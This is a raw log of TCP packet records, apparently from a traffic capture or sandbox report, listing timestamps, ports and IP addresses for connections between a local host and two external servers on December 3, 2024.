                                                                                                                                                                                  Dec 3, 2024 14:01:47.491802931 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.491961002 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.492053986 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.493319988 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.493505001 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.493587017 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.494854927 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.497889996 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.500055075 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598001003 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598028898 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598129034 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598560095 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598849058 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.598912001 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.599112034 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.599889040 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.599935055 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.599936962 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.600939989 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.600982904 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.601020098 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.602020025 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.602077961 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.602138042 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.603229046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.603302956 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.603341103 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.604222059 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.604283094 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.604298115 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.605281115 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.605349064 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.605446100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.606348991 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.606416941 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.606461048 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.607382059 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.607428074 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.607450962 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.608375072 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.608445883 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.608470917 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.609414101 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.609457970 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.609477043 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.610491037 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.610552073 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.610610962 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.611501932 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.611545086 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.611581087 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.612495899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.612576008 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.612634897 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.613500118 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.613554955 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.613574982 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.614557028 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.614607096 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.614713907 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.615655899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.615727901 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.615735054 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.616581917 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.616631985 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.616734982 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.617518902 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.617578030 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.617758036 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.618597984 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.618628025 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.618659019 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619517088 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619564056 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.619688034 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620587111 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620632887 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.620696068 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621484995 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621563911 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.621567011 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622639894 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622703075 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.622788906 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623620033 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623747110 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.623753071 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.624784946 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.624876022 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625169992 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625905037 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625962973 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.625988007 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.626893997 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.626962900 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627043009 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627810001 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627856970 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.627923012 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628772974 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628824949 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.628854990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629482985 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629559040 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.629622936 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630275011 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630331993 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.630398035 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631546021 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631598949 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.631710052 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632523060 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632575989 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.632597923 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633279085 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633333921 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.633352041 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634202957 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634258986 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.634387016 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635181904 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635263920 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.635287046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636183977 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636235952 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.636269093 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637192011 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637239933 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.637367964 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638138056 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638214111 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.638236046 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639105082 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639148951 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.639235020 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640088081 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640125990 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.640244961 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641088963 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641138077 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.641285896 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642066002 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642133951 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.642153978 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643075943 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643155098 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.643166065 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644025087 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644069910 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.644134998 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645015955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645076990 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.645106077 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646189928 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646249056 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.646387100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647063017 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647106886 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647200108 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.647988081 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648026943 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648040056 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.648983955 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649036884 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649090052 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.649985075 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.650029898 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.650055885 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799381018 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799475908 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799612045 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.799951077 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800008059 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800052881 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800828934 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800890923 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.800930023 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801786900 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801816940 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.801832914 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802769899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802851915 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.802892923 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.803744078 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.803792000 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.803837061 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.804747105 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.804841042 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.804862976 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.805721045 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.805815935 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.805846930 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.806703091 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.806766033 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.806806087 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.807698965 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.807764053 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.807801962 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.808696032 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.808741093 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.808834076 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.809648991 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.809705019 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.809732914 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.810709000 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.810790062 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.810859919 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.811646938 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.811697960 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.811795950 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.812669992 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.812716007 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.812846899 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.813663006 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.813724995 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.813831091 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.814563990 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.814630985 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.814697027 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.815653086 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:47.815694094 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:47.815762043 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:48.069122076 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:52.726435900 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:52.846432924 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:52.846499920 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:52.846601963 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:52.966613054 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979757071 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979825020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979839087 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979898930 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980019093 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980031967 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980043888 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980057001 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980072021 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980108023 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980264902 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980277061 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980290890 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980324030 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.099817991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.099872112 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.099960089 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.181050062 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.181220055 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.181294918 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.185182095 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.185244083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.186225891 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.194895983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.195099115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.195149899 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.202749968 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.202768087 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.202826977 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.210429907 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.210464001 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.210531950 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.219010115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.219028950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.219082117 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.229281902 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.229298115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.229370117 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.236898899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.237051964 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.237129927 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.244086981 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.244179964 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.244301081 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.253730059 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.253853083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.253938913 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.260973930 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.261008024 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.261107922 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.323941946 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:54.382782936 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.383270025 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.383351088 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.386921883 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.386939049 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.386990070 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.391827106 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.391987085 CET8049181142.93.65.161192.168.2.22
